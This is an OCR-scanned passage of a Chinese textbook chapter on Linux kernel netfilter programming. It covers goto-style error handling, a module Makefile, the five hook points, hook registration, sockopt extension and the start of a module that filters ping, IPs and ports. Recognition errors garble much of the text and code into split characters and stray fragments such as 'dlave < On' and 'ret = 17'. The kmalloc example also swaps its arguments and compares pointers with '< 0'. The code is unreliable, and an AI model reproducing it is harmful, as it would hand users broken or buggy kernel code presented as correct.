EE 置 状态 参数 等 。 


回复 : 释放 之 前 的 


Linux 内 核 中 经 常 采 用 的 一 种 错误 处 理 的 框架 是 采用 goto 语句 构建 倒置 的 容错 ， 虽 然 
goto 语句 备 受 批评 ,但 是 用 在 这 里 不 论 从 代码 结构 还 是 程序 效率 考虑 都 是 最 佳 的 选择 之 一 。 


例如 : 


static int _ init initialize(void) 


{ 
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int ret = 0; 
char *name = (char*) kmalloc (GFP KERNEL,sizeof (char)*80); 
/* 申 请 内 存 , 类 型 为 GFP_KERNEL*/ 
if(name < 0){ /* 申 请 失败 */ 
ret = 17 
goto ERROR1; 


ee *address = (char*) kmalloc (GFP KERNEL, sizeof (char)*80); 
/* 申 请 内 存 */ 
if(address < 0){ /* 申 请 失败 */ 
ret = 2; 
goto ERROR2; 
| 


unsigned short *age = (unsigned char*) kmalloc (GFP_ KERNEL, sizeof (short)); 
/* 申 请 内 存 */ 


dlave < On /* 申 请 失败 */ 
ret = 3; 
goto ERROR3; 
A 0; 
ERROR3: /* 回 复 点 3*/ 
kfree (address); /* 释 放 address*/ 
ERROR2: /* 回 复 点 2*/ 
kfree (name); /* 释 放 name */ 
ERROR1: /* 回 复 点 1*/ 
return ret; /* 正 常 返 回 #/ 
} 
内 核 初始 化 的 时 候 进行 3 个 动态 内 存 的 申请 ， 在 失败 时 按照 顺序 会 调用 相应 的 处 理 ， 


释放 内 存 并 退出 。 

当 程 序 到 达 ERROR3 时 ，address 已 经 申请 成 功 ， 所 以 要 释放 之 前 申请 的 这 些 内 存 ; 
到 达 ERROR2 时 ，name 已 经 申请 成 功 ， 也 要 释放 此 资源 ，ERROR1 处 只 要 返回 出 错时 设 
置 的 错误 值 就 可 以 了 。 

样 例 代码 中 的 错误 处 理 按照 错误 发 生 的 顺序 ， 对 申请 的 资源 进行 倒序 排列 。 


17.3.6 ”内 核 模 块 编译 所 需 的 Makefile 


编译 内 核 的 Makefile 有 如 下 特殊 的 地 方 : 

口 指定 内 核 模块 的 编译 文件 和 头 文件 路 径 ; 

口 指定 编译 模块 的 名 称 ; 

口 给 出 当前 模块 的 路 径 。 

在 17.1.1 节 中 的 “Hello World” 模 块 所 使 用 Makefile 的 代码 如 下 : 


target = hello 
obj-m := $( target) .o 
KERNELDIR = /lib/modules/'uname -r'/build 
default: 

$ (MAKE) -C $ (KERNELDIR) M= 'pwd' modules 
install: 

insmod $( target) .ko 
uninstall: 
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rmmod $( target) .ko 
clean: 
rm -rf *.0 *.mod.c *.Kko 
rm -rf Module.symvers .*cmd .tmp versions 


口 obj-m 指定 编译 模块 的 名 称 ,在 编译 的 时 候 , 会 自动 查找 hello.c 的 文件 , 将 其 编译 
为 hello.o， 生 成 hello.ko。 

口 当 模 块 来 自 多 个 文件 时 ， 要 用 module-objs 指定 其 文件 名 ， 本 例 中 内 核 模块 由 两 个 
文件 构成 :filel.c 和 file2.c，module-objs 的 规则 如 下 : 


module objs := filel.o file2.o 


口 在 Makefile 的 代码 中 , KERNELDIR 指定 了 内 核 源 代 码 树 代码 的 路 径 , 并 用 uname 
二 构建 了 此 路 径 。uname 命令 会 提供 用 户 系统 的 相关 信息 ，-r 选项 打印 出 发 布 内 


核 的 信息 。 
口 -C 选 项 要 求 改 变 目录 到 之 后 提供 的 KERNELDIR 目录 下 ， 在 那里 会 发 现 内 核 顶层 
的 Makefile。 


口 M= 选 项 要 求 在 建立 内 核 模块 前 ， 回 到 指定 的 路 径 。 一 般 用 pwd 命令 获得 。 
口 Makefile 的 样 例 代码 中 用 install 和 uninstall 来 加 载 模块 和 和 纯 载 模块 , 方便 进行 内 核 
模块 程序 的 调试 。 


17.4 5 个 钩子 点 


在 16 章 中 已 经 简单 地 介绍 了 netfilter 的 5 个 钩子 ， 本 节 对 5 个 钩子 挂 接点 进行 详细 的 
介绍 。 对 netfilter 中 5 个 钩子 的 挂 接 架构 、 含 义 和 使 用 方法 进行 比较 系统 的 了 解 之 后 ， 读 
者 可 以 根据 自己 的 需求 在 合适 的 钩子 点 进行 网 路 数据 的 监视 和 控制 ， 实 现 特定 的 目的 。 


17.4.1 netfilter 的 5 个 钧 子 点 


在 Linux 3.2 的 内 核 中 ，netfilter 中 共有 5 个 钩子 ， 分 别 是 PREROUTING 、 
POSTROUTING、INPUT、FORWARD 和 OUTPUT。 与 之 前 的 2.2 版 本 的 ipchains 相 比 ， 
多 了 PRTEROUTING 和 POSTROUTING， 它 们 是 为 支持 NAT 而 新 增加 的 。 
netfilter 在 设计 的 时 候 ， 考 虑 到 了 应 用 中 的 各 种 情况 。 在 IPv4 的 协议 栈 中 ，netfilter 在 
IP 数据 包 的 路 线 上 仔细 选取 了 5 个 挂 接点 (HOOK)。 这 5 个 点 中 ， 在 合适 的 位 置 对 
NF_HOOK() 宏 函数 进行 了 调用 ， 如 图 17.7 所 示 ， 这 5 个 点 的 含义 如 下 所 述 。 
口 NF_IP PRE ROUTING: 刚刚 进入 网 络 层 而 没有 进行 路 由 之 前 的 网 络 数据 会 通过 
此 点 (进行 完 版 本 号 、 校 验 和 等 检测 )。 

口 NF_IP_ FORWARD: 在 接收 到 的 网 络 数据 向 另 一 个 网 卡 进行 转发 之 前 通过 此 点 。 

口 NF_IP POST_ ROUTING: 任何 马上 要 通过 网 络 设备 出 去 的 包 通 过 此 检测 点 ， 这 是 
netfilter 的 最 后 一 个 设置 检测 的 点 ， 内 置 的 目的 地 址 转换 功能 (包括 地 址 伪装 ) 在 
此 点 进行 。 

口 NF_ IP LOCAL IN: 在 接收 到 的 报 文 做 路 由 ， 确 定 是 本 机 接收 的 报 文 之 后 。 

口 NF_IP_ LOCAL OUT: 在 本 地 报 文 做 发 送 路 由 之 前 。 
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网 络 妆 
网 络 数 据 NF _IP PRE ROUTINGH=~| 路 由 “上 ~|NFIP FORWARD 上 =~| NF IP POST ROUTING| 王 


| 


路 由 


NF IP LOCAL IN | 


NF IP LOCAL OUT 


t 


本 地 网 络 数 据 


图 17.7 netfilter 的 5 个 钩子 


当 物 理 网 络 上 有 网 络 数 据 到 来 时 ，ip_rev() 函 数 会 接收 到 。 此 函数 在 最 后 会 调用 
NF_HOOK 将 控制 权 交 给 在 PREROUTING 点 的 处 理 规则 处 理 。 如 果 此 处 没有 挂 接 钩子 函 
数 , 则 由 函数 ip_rcv_finish() 来 查询 路 由 表 , 判断 此 数据 是 发 给 本 地 还 是 转发 给 另 一 个 网 络 。 

如 果 此 网 络 数据 是 发 给 本 地 的 , 就 会 调用 ip_local_deliver() 函 数 。 该 函数 在 最 后 调用 宏 
NF_HOOK， 由 netfilter 的 INPUT 处 理 规则 处 理 。INPUT 处 理 完 后 交 给 传输 层 ， 传 给 应 用 
层 中 的 用 户 进程 。 

如 果 此 数据 是 转发 ， 会 调用 ip_rcv_finish() 函 数 ， 查 询 路 由 表 。 调 用 ip_route_input() 函 
数 后 将 控制 权 交 给 ip_forward() 函 数 。ip_forward() 函 数 在 最 后 会 调用 NF_HOOK 函数 宏 ， 
由 metfilter 的 FORWARD 处 理 规则 处 理 。 处 理 完毕 后 调用 ip_forward_finish() 函 数 ， 由 其 中 
的 ip_send() 函 数 将 数据 发 送 。 在 发 出 此 数据 之 前 会 通过 NF_HOOK 函数 宏 ， 由 netfilter 的 
POSTROUTING 处 理 规则 处 理 ， 处 理 完毕 后 ， 将 网 络 数据 转 给 网 络 驱动 程序 ， 通 过 网 络 设 
备 发 送 到 物理 网 络 上 。 

当 本 地 机 器 要 发 送 网 络 数据 时 ，netfilter 会 在 将 数据 交 给 规则 POSTROUTING 处 理 之 
前 ， 由 处 理 规则 OUTPUT 先进 行 处 理 。 


17.4.2 NF_HOOK 宏 


netfilter 的 框架 是 在 协议 栈 处 理 过 程 中 调用 函数 宏 NF_HOOK()， 插 入 处 理 过 程 来 实现 
的 。NF_HOOK0 函 数 宏 定 义 在 include/linux/netfilter.h 里 ， 实 现代 码 如 下 : 

#ifdef CONFIG NETFILTER 

#define NF HOOK(pf, hook, skb, indev, outdev, okfn) \ 

nf hook slow((pf), (hook), (skb), (indev), (outdev), (okfn))) 

#else 


#define NF HOOK(pf, hook, skb, indev, outdev, okfn) (okfn) (skb) 
#endif /*CONFIG NETFILTER*/ 


从 该 函数 宏 的 实现 可 知 ， 当 在 编译 内 核 时 选择 了 编译 netfilter (#ifdef CONFIG_ 
NETFILTER), 就 会 调用 nf_hook_slow() 函 数 ; 如 果 没 有 编译 netfilter(CONFIG_NETFILTER 


没有 定义 ), 则 调用 NF_HOOK 宏 中 的 参数 okfn, 实际 上 这 是 一 个 函数 指针 , 指出 从 netfilter 
模块 转 回 到 IPv4 协议 栈 ， 继 续 往 下 处 理 时 要 执行 的 函数 。 现 在 来 看 一 下 NF_HOOK 宏 即 
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nf_hook_slow() 函 数 的 调用 时 机 。 
其 中 一 个 调用 的 地 方 是 ip_rev0 函 数 , 它 是 了 P 层 接收 报 文 的 总 入 口 ， 函数 的 代码 如 下 : 


dp rev() 


ei NF_HOOK(PF_INET, NF_IP_ PRE ROUTING, skb, dev, NULL, ip rcv finish); 

} 

ip_rcv(0) 函 数 只 是 对 接收 到 的 IP 报 文 进行 了 校 验 和 检查 ， 没 有 对 其 进行 路 由 ， 然 后 就 
调用 了 nf _ hook_slow() 函 数 。 

nf_hook_slow() 函 数 的 主要 功能 就 是 根据 pf 和 hook 参数 (这 里 分 别 为 PF_INET， 
NF_IP_PRE_ROUTING), 索引 数组 nf hooks。nf hooks 是 一 个 二 维 数 组 ， 定 义 如 下 : struct 
list_head nf_hooks[NPROTO][INF_MAX _HOOKS]。 可 见 数组 中 每 个 元 素 为 一 个 链表 头 元 素 ， 
即 每 个 数组 元 素 可 以 延伸 出 一 个 链表 。 

链表 中 每 个 元 素 为 一 个 nf hook_ops 结构 。nf hook_slow0 函 数 在 索引 得 到 对 应 的 链表 
后 ， 会 遍历 这 个 链表 ， 对 链表 中 的 每 个 元 素 执行 其 hook() 函 数 。 并 根据 hook() 函 数 的 返回 
值 ， 决 定 对 耳 数据 包 进 行 下 一 步 处 理 。 

在 文件 include/linux/netfilter.h 里 定义 了 netfilter 最 多 能 够 挂 接 的 钩子 数量 : 


/* Largest hook number + 1 */ 
#define NF MAX HOOKS 8 


也 就 是 说 netfilter 最 多 能 够 支持 挂 接 8 个 钩子 。 
17.4.3 ”钩子 的 处 理 规 则 


netfilter 的 钩子 函数 的 返回 值 可 以 为 NF_ACCEPT、NF_DROP、NF_STOLEN.、 
NF_QUERE、NF_REPEAT 这 5 个 值 ， 其 含义 如 下 所 述 。 

口 nf accept: 继续 传递 ， 保 持 和 原来 传输 的 一 致 ， 

口 nf drop: 丢弃 包 ; 不 再 继续 传递 ; 

口 nf stolen: 接管 包 ; 不 再 继续 传递 ; 

口 nf quere: 队列 化 包 (通常 是 为 用 户 空 间 处 理 做 准备 ); 

口 nf repeat: 再 次 调用 这 一 个 钧 子 。 

当 钧 子 函 数 的 返回 值 为 NF_ACCEPT 时 ， 在 同一 个 点 挂 接 的 多 个 钩子 均 可 以 执行 。 执 
行 完毕 后 nf_hook_slow() 函 数 会 调用 它 参 数 中 的 okfn() 函 数 , 转 跳 到 协议 栈 进入 正常 的 网 络 
协议 处 理 过 程 。 


17.5 ”注册 /注销 钩子 


上 节 介 绍 了 netfilter 的 5 个 钩子 ， 可 以 在 5 个 钧 子 处 注册 钧 子 函数 ， 对 网 络 数据 插入 
自己 的 处 理 。 本 节 将 介绍 netfilter 的 注册 和 注销 钩子 函数 的 接口 ， 主 要 有 nf register_ hook、 


nf unregister hook、 nf register_sockopt 及 nf unregister_sockopt 等 。 
17.5.1 结构 nf_hook_ops 
结构 nf hook_ops 是 netfilter 架构 中 的 常用 结构 ， 定 义 如 下 所 述 。 
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struct nf hook ops 


{ 


口 


struct list head list; /* 钧 子 链表 */ 

nf_hookfn *hook; /* 钧 子 处 理 函 数 */ 

struct module *owner; /* 模 块 所 有 者 */ 

int pf; /* 钩 子 的 协议 族 */ 

int hooknum; /* 钧 子 的 位 置 值 */ 

int priority; /* 钩 子 的 优先 级 ,默认 情况 下 为 继承 优先 级 */ 


list: 结构 nf hook_ops 构成 一 个 链表 ，list 是 此 链表 的 表 头 ， 把 各 个 处 理 函 数组 织 
成 一 个 表 。 初 始 值 为 {NULL，NULL}。 

hook: 用 户 自 定义 的 钧 子 函 数 指针 , 它 的 返回 值 必 须 为 NF_DROP、NF_ACCEPT、 
NF_STOLEN、 NF_ QUEUE、 NF_REPEAT、 NF_STOP 之 一 。 

pf: 协议 族 , 表示 这 个 HOOK 属于 哪个 协议 族 ; 例如 对 ipv4 而 言 , 设 定 为 PF_INET。 
hooknum: 用 户 想 注册 的 钧 子 位 置 ， 取 值 为 5 个 钩子 (NF_INET_PRE_ROUTING、 
NF INET LOCAL IN ~、 NF INET FORWARD 、 NF INET LOCAL OUT 、 

NF_INET_POST_ROUTING、NF_INET_NUMHOOKS) 之 一 。 一 个 挂 接 点 可 以 挂 
接 多 个 钩子 函数 ， 谁 先 被 调用 要 看 优先 级 。 

priority: 优先 级 ， 目 前 netfilter 在 IPv4 中 定义 了 多 个 优先 级 ， 取 值 越 小 优先 级 
越 高 。 


用 户 注册 的 钧 子 函数 原型 定义 如 下 ， 其 中 的 参数 由 netfilter 自动 传 给 钧 子 函数 : 


typedef unsigned int nf hookfn (unsigned int hooknum, 


struct sk buff *skb, 

const struct net device *in, 
const struct net device *out, 
int (*okfn) (struct sk buff *)); 


其 中 ，okfn() 函 数 是 当 回调 函数 为 空 时 netfilter 调用 的 处 理 函 数 。 


T1752 


注册 钩子 


为 了 方便 其 他 的 内 核 模块 操作 网 络 数据 ，netfilter 提供 了 注册 钧 子 的 函数 ， 其 原型 在 
netfilterh 中 声明 ， 有 具体 实现 在 文件 netfilterc 中 : 

int nf _register hook(struct nf hook ops *reg); 

此 函数 在 内 核 代码 中 实现 如 下 : 


int nf _ register hook(struct nf hook ops *reg) 


struct nf hook ops *elem; 
int err; 
err = mutex lock interruptible(&nf hook mutex) /* 锁 定 中 断 */ 
if (err < 0) 
return err; 
list for each entry(elem, é&nf hooks [reg->pf] [reg->hooknum], list) { 
/* 遍 历 链表 */ 
if (reg->priority < elem->priority) /* 判 定 优先 级 */ 


.495 。 


第 3 篇 Linux 内 核 网 络 编程 
break; 


list add rcul(lg&reg->list, elem->list.prev); 
mutex unlock (gnf hook mutex); /* 解 开 中 断 */ 
return 0; 
时 
这 个 函数 在 nf_hook_ops 链表 中 插入 一 个 用 户 自 定义 的 nf_hook_ops 结构 ,在 合适 的 时 
机 调用 用 户 注册 的 函数 。 当 注册 成 功 时 ， 返 回 值 为 0; 失败 时 ， 则 返回 一 个 小 于 0 的 错 
误 值 。 
注册 回调 函数 时 ， 要 首先 书写 回调 函数 ， 然 后 将 其 挂 接 到 nf hook_ops 链 上 。 如 下 过 
程 为 注册 一 个 回调 函数 。 
口 回调 函数 如 下 ， 仅 仅 打印 一 条 信息 “Hello World Hook”: 
static unsigned int 
hello hookfn (unsigned int hooknum, 
struct sk buff *skb, 
const struct net device *in, 


const struct net device *out, 
int (*okfn) (struct sk buff *)) 


printk (KERN ALERT "Hello World Hook\n"); 
return NF ACCEPT; 
} 


口 构建 nf hook ops， 将 此 结构 挂 接 在 IP 层 NF_IP_POST_ROUTING 点 上 ， 优 先 级 
为 0: 


static struct nf hook ops hello ops 
= { { NULL, NULL }, hello hook, PF_INET, NF _IP POST ROUTING, 0 }; 


口 注册 钧 子 函 数 : 
static int _ init init(void) 


1 
return nf register hook(&hello ops); 


} 


module init(init); 


17.5.3 ”注销 钩子 
注销 钧 子 的 函数 比较 简单 , 将 nf_unregister_hook() 函 数 注 册 的 钩子 函数 注销 就 可 以 了 。 
其 原型 如 下 : 
void nf unregister hook(struct nf hook ops *reg); 
例如 ， 采 用 如 下 方式 注销 钩子 函数 : 


static void exit exit(void) 


{ 


nf unregister hook(&hello ops); 
h 
module exit (exit); 


在 netfilter 中 还 有 一 次 注册 注销 多 个 钩子 的 函数 : 
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int nf register hooks(struct nf hook ops +*reg, unsigned int n); 
void nf unregister hooks(struct nf hook ops *reg, unsigned int n); 


其 中 ， 参 数 reg 输入 的 为 一 个 数组 ，n 为 注册 钧 子 的 个 数 。 注 册 注 销 的 时 候 ， 会 轮 询 
数组 reg， 一 次 对 多 个 钩子 进行 操作 。 


17.5.4 注册 注销 函数 


除了 上 面 介绍 的 nf register hook0 和 nf_unregister_hook() 函 数 族 ，netfilter 框架 中 还 有 
其 他 的 注册 函数 ， 例 如 socket 的 选项 控制 的 钩子 函数 注册 和 注销 函数 。 

在 第 12 章 中 介绍 了 套 接 字 选 项 ， 例 如 可 以 设置 套 接 字 的 超时 时 间 、 接 收 缓冲 区 大 小 
等 来 控制 socket。 在 netfilter 中 ，nf register_sockopt() 和 nf_unregister_sockopt() 函 数 是 在 
socket 的 选项 控制 上 挂 接 钧 子 函数 ,使 得 用 户 可 以 注册 自己 的 opt 函数， 处 理 特殊 的 socket 
控制 。 

nf (un)register_sockopt() 函 数 用 于 添加 卫 RAW 级 别 的 命令 字 ， 可 以 动态 注册 和 注销 
sockopt() 函 数 命 令 字 。 注 册 函 数 将 一 个 nf sockopt_ops 结构 的 新 的 命令 字 控 制 添加 到 链表 
中 ， 当 用 户 调用 sockopt0) 函 数 时 ， 会 查找 链表 中 的 钧 子 函数 ， 响 应 用 户 的 调用 。 

注册 和 注销 的 函数 原型 如 下 : 

int nf register sockopt (struct nf sockopt ops *reg); 

void nf unregister sockopt(struct nf_ sockopt ops *reg); 


结构 nf_sockopt_ops 的 声明 为 : 


struct nf_sockopt_ops 
| 
struct list head list; 
Lint pfs 
int set optmin; 
int set_optmax; 
int (*set) (struct sock *sk, int optval, void _ user *user, unsigned int 
len); 
int (*compat set) (struct sock *sk, int optval, 
void _ user *user, unsigned int len); 
int get_ optmin; 
int get_ optmax; 
int (*get) (struct sock *sk, int optval, void _ user *user, int *len); 
int (*compat get) (struct Sock *sk, int optval, 
void _ user *user, int *len); 
/* Use the module struct to lock set/get code in place */ 
struct module *owner; 


list: 链表 的 头 指针 。 

set_optmin: 设置 sockopt 命令 匹配 范围 的 最 小 值 。 

set_optmax: 设置 sockopt 命令 匹配 范围 的 最 大 值 。 

set: 设置 函数 实现 ， 此 函数 对 应 用 层 的 setsockopt0 函 数 进行 响应 ， 按 照应 用 层 传 
入 的 数据 进行 设置 。 
口 get_optmin: 获取 sockopt 命令 匹配 范围 的 最 小 值 。 


OOOODD 
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口 get_optmax: 获取 sockopt 命令 匹配 范围 的 最 大 值 。 
口 get: 获取 函数 实现 ， 此 函数 对 应 用 层 的 getsockopt() 函 数 进行 响应 ， 将 当前 内 核 中 
的 设置 返回 给 应 用 层 。 
sockopt(O) 函 数 注册 函数 将 按照 用 户 的 指定 实现 特定 的 sockopt 命令 响应 函数 。 当 要 注册 
set0 函 数 时 , 根据 set_ optmin 和 set_optmax 来 判断 某 个 sockopt 调用 是 否 由 本 函数 响应 ; 当 
为 getO) 函 数 时 ， 则 判断 get_optmin 和 get_optmax 范围 。 


17.6 ”钩子 的 简单 处 理 例子 


本 节 将 介绍 一 个 钧 子 编程 的 例子 ， 使 读者 通过 本 例 了 解 netfilter 钓 子 编程 的 框架 ， 对 
其 流程 有 基本 的 了 解 。 


17.6.1 功能 描述 


本 例 通 过 编写 可 加 载 内 核 模块 ， 利 用 netfilter 的 框架 ， 注 册 钧 子 函 数 对 网 络 数据 进行 
处 理 ， 达 到 如 下 的 功能 。 
屏蔽 ping 的 回 显 : 当 用 户 ping 本 机 时 ， 本 机 不 进行 响应 。 
禁止 向 某 个 IP 发 送 数据 ; 按照 用 户 的 配置 ， 禁止 本 机 向 某 个 人 P 地 址 发 送 数 据 。 
关闭 端口 ， 关 闭 某 个 端口 ， 不 进行 响应 。 
可 动态 修改 设置 : 可 以 在 用 户 空 间 修改 以 上 3 种 功能 的 配置 。 可 动态 屏蔽 或 者 取 
消 屏蔽 ping 回 显 的 功能 ;用户 禁止 向 某 个 卫 发 送 数据 功能 中 的 IP 地 址 可 以 由 用 
户 配 置 ， 关闭 的 端口 由 用 户 端 进行 定义 ， 并 能 取消 此 功能 。 


17.6.2 ”需求 分 析 


要 实现 17.6.1 节 的 功能 ， 需 要 在 NF IP LOCAL IN 和 NF_IP_LOCAL OUT 两 个 监测 
点 挂 接 钧 子 函数 。 在 挂 接点 NF_IP_LOCAL IN 处 ， 根 据 设 置 对 进入 本 机 的 数据 进行 丢弃 
或 者 接受 ; 在 挂 接点 NEF_IP LOCAL OUT 处 ， 修 改 MAC 地址， 如 图 17.7 所 示 。 

在 17.5.4 节 中 介绍 了 sockopt 的 扩展 方法 ， 利 用 sockopt0 函 数 可 以 实现 特定 的 命令 处 
理 方式 。 利 用 内 核 模 块 的 sockopt 扩展 ， 实 现 特定 的 功能 ， 用 户 空间 的 程序 通过 与 内 核 模 
块 交互 ， 实 现 动态 修改 设置 。 命 令 处 理 方式 如 表 17.1 所 示 。 


DOOO 


表 17.1 扩展 sockopt 命令 表 


SOE_BANDIP SOE_BANDPORT SOF_BANDPING 
卫 地 址 协议 类 型 和 端口 无 
禁止 向 某 卫 发 送 数据 禁止 某 端 口 响应 禁止 ping 回 显 


表 17.1 中 的 3 种 扩展 功能 均 可 以 通过 getsockopt() 函 数 获取 当前 设置 情况 ， 或 者 通过 
setsockopt() 函 数 来 进行 设置 。 


17.6.3 ”ping 回 显 屏蔽 实现 
ping 的 功能 是 通过 ICMP 协议 实现 的 ， 因 此 在 netfilter 对 网 络 数据 的 处 理 过 程 中 ， 将 


f 
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其 数据 丢掉 ， 协 议 栈 就 不 会 进行 处 理 。 本 处 理 过 程 应 该 在 netfilter 的 LOCAL IN 挂 接点 进 
行 ， 此 时 数据 包 还 没有 进入 协议 栈 。 处 理 过 程 如 图 17.8 所 示 ， 从 sk_buff 结构 可 以 获得 IP 
的 头 部 ， 根 据 卫 中 的 协议 段 来 判断 是 否 为 ICMP 协议 ， 决 定 是 否 丢掉 该 包 。 


17.6.4 禁止 向 目的 IP 地 址 发 送 数据 的 实现 


向 目的 IP 地 址 发 送 数据 的 过 程 位 于 发 送 处 理 过 程 ， 因 此 在 LOCAL OUT 挂 接点 进行 
处 理 ， 如 图 17.9 所 示 。 可 以 从 IP 头 部 的 目的 地 址 变量 中 得 到 IP 地 址 , 与 预 置 的 人 P 值 进行 
匹配 ， 如 果 匹 配 ， 则 丢弃 该 包 ， 不 进行 发 送 。 

17.6.5 ”端口 关闭 实现 

实现 端口 关闭 的 方式 有 多 种 ， 比 较 方便 的 一 种 是 在 数据 进入 的 时 候 就 进行 截取 ， 然 后 
判断 处 理 。 由 于 端口 的 协议 分 为 UDP 和 TCP， 在 处 理 的 时 候 两 种 协议 都 要 进行 判断 ， 按 
照 不 同 的 方式 在 挂 接点 LOCAL _IN 进行 处 理 ， 如 图 17.10 所 示 。 在 数据 进入 netfilter 后 ， 
先 判 断 其 protocol 类 型 再 进行 处 理 。 


Netfilter 


TCP/IP 协 议 栈 
Netfilter 


1 获得 IP 头 
Iph=ip_hdr (sk); 
获得 Ip 头 Netfilter 
Iph=ip_hdr(sk); 
1 
判断 协议 类 型 
获得 了 P 头 iph->protocol 
Iph=ip_hdr (sk); UDP 0 
TCP 
判断 IP 地 址 ! ! 
Src ip 一 iph- E 
UDP 丢弃 TCP 丢 弃 
是 
+ 
De i 
图 17.8 ping 回 显 禁止 ”图 17.9 目的 人 P 地 址 禁止 数 图 17.10 端口 禁止 的 实现 流程 
据 发 送 处 理 流程 


17.6.6 ”动态 配置 实现 


动态 配置 的 实现 采用 了 注册 私有 sockopt 的 方法 ， 使 用 API 函数 nf register_sockiptO 
在 卫 RAW 层 注册 一 个 私有 的 sockopt 处 理 钩子 函数 ， 利 用 其 中 的 回调 函数 set() 和 get() 来 
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实现 与 用 户 层 的 交互 。 

在 getsockopt 的 扩展 中 ， 本 例 中 的 实现 在 判断 cmd 命令 合法 后 ， 直 接 将 数据 复制 到 用 
户 空间 ， 没 有 进行 cmd 字 的 匹配 。 

在 setsockopt 的 扩展 中 ， 先 将 用 户 输 入 的 参数 复制 到 内 核 空 间 ， 然 后 进行 相应 的 设置 。 
如 果 为 IP 地 址 禁止 发 送 的 命令 ， 则 设置 其 对 应 参数 ; 如 果 为 端口 禁止 的 命令 ， 则 查看 相应 
的 协议 ， 根 据 UDP 和 TCP 的 不 同 来 设置 协议 类 型 和 端口 ;如果 为 PING 回 显 禁 止 就 设置 
此 布尔 类 型 变量 。sockopt 扩展 的 流程 图 如 图 17.11 和 图 17.12 所 示 。 


setsockopt 用 户 层 


f 
TCP/P 协 议 栈 | 。 内 核 层 


EE 


TCP/IP 协 议 栈 内 核 层 


getsockopt 用 户 层 


Netfilter 
了 | 
Netfilter 权限 合法 性 判断 
权限 合法 性 判断 
Copy_from user 


判断 cmd 类 型 Ping 回 显 cmd 本 天 断 cmd 类 型 端口 访问 cmd 匹 配 


匹配 JP 发 送 cmd 匹 配 
, 
设置 ping 回 显 禁 止 设置 IP 发 送 禁 止 | 设置 端口 访问 禁止 
Copy _to_user 
图 17.11 getsockopt 扩展 图 17.12 setsockopt 扩 展 


在 sockopt 扩展 中 ， 有 两 个 比较 特殊 的 函数 copy_to_user() 和 copy_from_user(), 这 两 个 
函数 用 户 空间 和 内 核 空间 的 数据 交互 。copy_to_user 将 内 核 空 间 的 数据 复制 到 用 户 空间 ， 
copy_from_user 将 用 户 空 间 的 数据 复制 到 内 核 空间 。 


全 注意 : 这 两 个 函数 的 第 一 个 参数 都 是 to， 即 复制 数据 的 目的 地 ， 第 二 个 参数 为 fom， 即 
复制 数据 的 来 源 , 最 后 一 个 参数 是 要 复制 数据 的 长 度 。 在 使 用 这 两 个 函数 的 时 候 ， 
一 定 要 进行 操作 是 否 成 功 的 判断 ， 因 为 用 户 层 经 常 有 程序 出 现 不 合法 的 参数 输入 
或 者 指针 错误 的 情况 发 生 。 函数 声明 如 下 : 
int copy to_user (void _user #to， const void *#from, int n); 


“500。 
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int copy_ from user(void *#to, const void _user *from, int n) 


17.6.7 ”可 加 载 内 核实 现代 码 


对 ping 进行 过 滤 的 内 核 代 码 ， 利 用 netfilter 的 5 个 钩子 对 进出 本 地 网 络 接口 的 数据 进 
行 过 滤 ， 来 实现 ping 数据 包 的 丢弃 。 


1. 结构 sockopt 的 扩展 


由 于 进行 sockopt 扩展 应 用 层 和 内 核 层 需 要 共用 一 致 的 cmd 命令 和 数据 结构 ， 在 
nf_sockopte.h 文件 中 定义 如 下 数据 类 型 ，sockopt 命令 的 扩展 可 以 选择 内 核 源 文件 socket.h 
中 的 未 用 值 来 用 。 

(1) 操作 命令 定义 。 定义 用 户 空间 交互 的 儿 个 命令 : SOE BANDIP、SOE rt 
和 SOE_BANDPING， 分 别 用 于 禁止 IP 某 个 地 址 发 送 的 ping、 禁 止 某 个 端口 的 数据 和 禁 
ping 操作 。 


/* file: nf_sockopte.h 

* example 17-1 

* author: songjingbin <flyingfat@163.com> 
* SOCkopt extern header file */ 
#ifndef NF SOCKOPTE H 

#define NF SOCKOPTE H 

/* cmd 命令 定义 : 

SOE_BANDIP: IP 地 址 发 送 禁 止 命令 
SOE_BANDPORT: 端口 禁止 命令 
SOE_BANDPING: ping 禁止 

*/ 

#define SOE BANDIP 0x6001 
#define SOE BANDPORT 0x6002 
#define SOE BANDPING 0x6003 


(2) 用 于 数据 交互 的 数据 结构 。 定 义 了 两 个 结构 : nf bandport 和 band_status。 其 中 ， 
前 者 用 于 传 入 用 户 禁 止 的 协议 和 端口 ， 后 者 用 于 获得 用 户 的 数据 ,例如 所 禁止 的 主机 卫 地 
址 、 所 禁止 的 端口 ， 以 及 禁止 的 ping 操作 。 

/禁止 端口 结构 #7 


typedef struct nf bandport 


{ 
/* band protocol, TCP?2UDP */ 
unsigned short protocol; 


/* band port */ 
unsigned short port; 


}; 

/* 与 用 户 交互 的 数据 结构 */ 

typedef struct band statust{ 
/* IP 发送 禁 止 , IP 地 址 , 当 为 0 时 ,未 设置 */ 
unsigned int band ip; 
/* 端口 禁止 , 当 协议 和 端口 均 为 0 时 ,未 设置 */ 
nf bandport band port; 


ss 


如 ， 
操 
中 国 


扩 
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/* 是 否 人 允许 ping 回 显 响应 , 为 0 时 响应 ,为 1 时 禁止 */ 


unsigned char band ping; 
}band status; 
#endif /* NF SOCKOPTE H _*/ 


2. 内 核实 现代 码 


内 核 层 的 代码 实现 如 下 , 在 模块 初始 化 的 时 候 挂 接 了 3 个 钩子 nfin、nfout 和 nfsockopt。 
口 nfin 钧 子 在 NF_IP_ LOCAL IN 处 ， 其 处 理 函数 nf hook in() 负 责 处 理 IP 发 送 禁止 
功能 的 相关 数据 。 
口 nfout 钧 子 在 NF_P_LOCAL OUT 处 ， 其 处 理 函 数 nf_hook_out() 负 责 处 理 ping 禁 
止 和 端口 禁止 功能 相关 的 网 络 数据 。 
口 nfsockopt 钩子 则 实现 了 私有 的 sockopt 调用 ， 负 责 参数 的 动态 配置 。 
(1) 函数 和 变量 定义 。 在 进行 正式 的 代码 设计 之 前 ， 先 定义 了 一 些 方便 操作 的 宏 。 例 
用 于 判断 是 否 为 禁止 TCP 端口 操作 的 宏 IS_BANDPORT_TCP、 是 否 为 禁止 UDP 端口 
作 的 宏 IS_BANDPORT_UDP、 是 否 为 禁止 主机 IP 操作 的 宏 IS_BANDIP， 以 及 是 否 为 禁 
ping 操作 的 宏 IS_BANDPING。 
同时 ， 定 义 了 一 个 全 局 变量 b_status， 用 于 控制 整个 程序 的 禁止 状态 


#include <linux/netfilter ipv4.h> 

#include <linux/module.h> 

#include <linux/kernel.h> 

#include <linux/skbuff.h> 

#include <linux/ip.h> /*IP 头 部 结构 */ 
